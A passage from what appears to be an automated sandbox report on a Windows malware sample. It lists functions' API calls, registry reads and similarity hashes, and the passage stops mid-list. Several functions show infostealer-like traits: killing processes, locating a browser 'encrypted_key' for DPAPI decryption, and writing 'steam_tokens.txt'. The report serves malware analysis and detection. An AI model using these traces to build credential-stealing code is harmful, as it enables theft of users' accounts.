                                Function 004F4740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 004F4759
                                • Process32First.KERNEL32(00000000,00000128), ref: 004F4769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004F479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004F47AB
                                • CloseHandle.KERNEL32(00000000), ref: 004F47B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 004F47C0
                                • CloseHandle.KERNEL32(00000000), ref: 004F47CB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: ffaf4a6120589d01dfabe2ad4c04af2ac0fba03f339532e6bb24393c60c9544a
                                • Instruction ID: 36b0f1d14b1b69456b66e69eb6cabefa24fc62fa9d023b1ee43038cf37ed96d3
                                • Opcode Fuzzy Hash: ffaf4a6120589d01dfabe2ad4c04af2ac0fba03f339532e6bb24393c60c9544a
                                • Instruction Fuzzy Hash: 2D019271601219EBE7206B709C89FFB77BCEB48751F048291FB4591181EF789D908A69
                                Function 004E83E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 004E8435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E846C
                                • lstrlen.KERNEL32(00000000), ref: 004E84B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E84E9
                                • lstrlen.KERNEL32(00000000), ref: 004E84FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E852E
                                • StrCmpCA.SHLWAPI(00000000,00504C3C), ref: 004E853E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c4dbe9568eae01d18bec728b26033410778dce8defd58107eaaa6d7835ab92e3
                                • Instruction ID: 4715e4050150a2cad269be82de406155c17cfe00f555265a4eba4f4a02c37c33
                                • Opcode Fuzzy Hash: c4dbe9568eae01d18bec728b26033410778dce8defd58107eaaa6d7835ab92e3
                                • Instruction Fuzzy Hash: 5551CF716002069FCB20DF6AD994A5BB7F4EF48301F14895EEC89DB345EF38E9418B54
                                Function 004F2910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004F2925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F292C
                                • RegOpenKeyExA.ADVAPI32(80000002,00CEBA98,00000000,00020119,004F28A9), ref: 004F294B
                                • RegQueryValueExA.ADVAPI32(004F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004F2965
                                • RegCloseKey.ADVAPI32(004F28A9), ref: 004F296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 58e64b7c1b7ce8e2f9f41e90bb671c8736ea0b70e2b4ee13afb563f09bd3f0bd
                                • Instruction ID: d67ed915d23cef1965ae0f1345c9fbed7c8c15e456040747bf152f85308594b5
                                • Opcode Fuzzy Hash: 58e64b7c1b7ce8e2f9f41e90bb671c8736ea0b70e2b4ee13afb563f09bd3f0bd
                                • Instruction Fuzzy Hash: 0C01F1B4600319EBD310CBA09C58EFB7BACEB08701F108158FF8497281EAB459048794
                                Function 004F2880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004F2895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F289C
                                  • Part of subcall function 004F2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 004F2925
                                  • Part of subcall function 004F2910: RtlAllocateHeap.NTDLL(00000000), ref: 004F292C
                                  • Part of subcall function 004F2910: RegOpenKeyExA.ADVAPI32(80000002,00CEBA98,00000000,00020119,004F28A9), ref: 004F294B
                                  • Part of subcall function 004F2910: RegQueryValueExA.ADVAPI32(004F28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 004F2965
                                  • Part of subcall function 004F2910: RegCloseKey.ADVAPI32(004F28A9), ref: 004F296F
                                • RegOpenKeyExA.ADVAPI32(80000002,00CEBA98,00000000,00020119,004E9500), ref: 004F28D1
                                • RegQueryValueExA.ADVAPI32(004E9500,00CFF5A0,00000000,00000000,00000000,000000FF), ref: 004F28EC
                                • RegCloseKey.ADVAPI32(004E9500), ref: 004F28F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: fc0e672230ecf564a1b52adca10001acdc9788447c34c06b944f272390ac0f26
                                • Instruction ID: b4a9f1367af96ff26974190d6cb80c6e5b286c62de8f8afd763ffd003591c579
                                • Opcode Fuzzy Hash: fc0e672230ecf564a1b52adca10001acdc9788447c34c06b944f272390ac0f26
                                • Instruction Fuzzy Hash: FB01DFB0600209FBD710ABA4AD49EBB776CEB44301F008259FF08D2290EEB8590087A5
                                Function 004D71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 004D723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 004D7279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D7280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004D72C3
                                • HeapFree.KERNEL32(00000000), ref: 004D72CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 004D7329
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: 667f31ec325d794fea49c29ef13f72668ebe1d2f3c3da75e3c0062b3023b6da0
                                • Instruction ID: 7e7cb933e66bb28ffb3c463869bc32df6b9d023dbd5152056cf5a2e88e691653
                                • Opcode Fuzzy Hash: 667f31ec325d794fea49c29ef13f72668ebe1d2f3c3da75e3c0062b3023b6da0
                                • Instruction Fuzzy Hash: 69416971B05606DBDB20CFA9DC94BAAB3E8EB88305F1445ABED49C7350F639E900DB54
                                Function 004D9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 004D9CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004D9CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 004D9D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: 2346949ffa77885765a3e9e91a1a2b881747d85de018f3e5ac1f45f7af191f57
                                • Instruction ID: 868afdb2bd99658114cafa0ad9ce5ef3339af25d68f102b4e97e150b602696a3
                                • Opcode Fuzzy Hash: 2346949ffa77885765a3e9e91a1a2b881747d85de018f3e5ac1f45f7af191f57
                                • Instruction Fuzzy Hash: C641EF31A002199BCB21EF65DD616AFB7B5EF54308F04416BE915E7352DA78ED00C788
                                Function 004EE9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004EEA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EEA53
                                • lstrcat.KERNEL32(?,00000000), ref: 004EEA61
                                • lstrcat.KERNEL32(?,00501794), ref: 004EEA7A
                                • lstrcat.KERNEL32(?,00CF9440), ref: 004EEA8D
                                • lstrcat.KERNEL32(?,00501794), ref: 004EEA9F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: de989bd2118dff75bdb0416a0e7680eb067dfbaa918f19f16a53c54d2990292f
                                • Instruction ID: 1d65fc97e1e1b7e8e3ff6c34b0c7a253002aa28bb338c815c9aa7fdb5f032643
                                • Opcode Fuzzy Hash: de989bd2118dff75bdb0416a0e7680eb067dfbaa918f19f16a53c54d2990292f
                                • Instruction Fuzzy Hash: EA41D271A10118EBCB50EB65DD52FEE7378FF58300F0045AAFA1A97391DE789E448B98
                                Function 004EECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EECDF
                                • lstrlen.KERNEL32(00000000), ref: 004EECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EED1D
                                • lstrlen.KERNEL32(00000000), ref: 004EED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 004EED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: d4fe9f6d4e41484c24224eea8c493d1f7d2d69b647e4eb84b55e3d84549e3d0b
                                • Instruction ID: c9a1f58ff6d374920d8743d4ea3b46ddfdc2a46064c880126d4eee89c2366676
                                • Opcode Fuzzy Hash: d4fe9f6d4e41484c24224eea8c493d1f7d2d69b647e4eb84b55e3d84549e3d0b
                                • Instruction Fuzzy Hash: 5A319C31B1015A9BC721BB7BEE5AA6F7764AF20305F00516BF806CB322DA6CDC058799
                                Function 004D9A80 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004D140E), ref: 004D9A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004D140E), ref: 004D9AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,004D140E), ref: 004D9AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,004D140E,00000000,?,?,?,004D140E), ref: 004D9AE0
                                • LocalFree.KERNEL32(?,?,?,?,004D140E), ref: 004D9B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,004D140E), ref: 004D9B07
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: d0e3df8d473c4c9aaba15e6993cea221f4405f4c9aa29faffb0b40e576ae671d
                                • Instruction ID: 22e1b7ecfc4c0a944c9fb7969fb5689cabde9c9df6811f4af520cfe59d1cd9c7
                                • Opcode Fuzzy Hash: d0e3df8d473c4c9aaba15e6993cea221f4405f4c9aa29faffb0b40e576ae671d
                                • Instruction Fuzzy Hash: 10113A7160020AEFE710DFA9DC99AAB736CEB05340F10425BF915D6380EB78AD00CBA9
                                Function 004F5AD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 004F5B14
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA188
                                  • Part of subcall function 004FA173: std::exception::exception.LIBCMT ref: 004FA1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 004F5B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 004F5B89
                                • memmove.MSVCRT(00000000,?,?), ref: 004F5B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
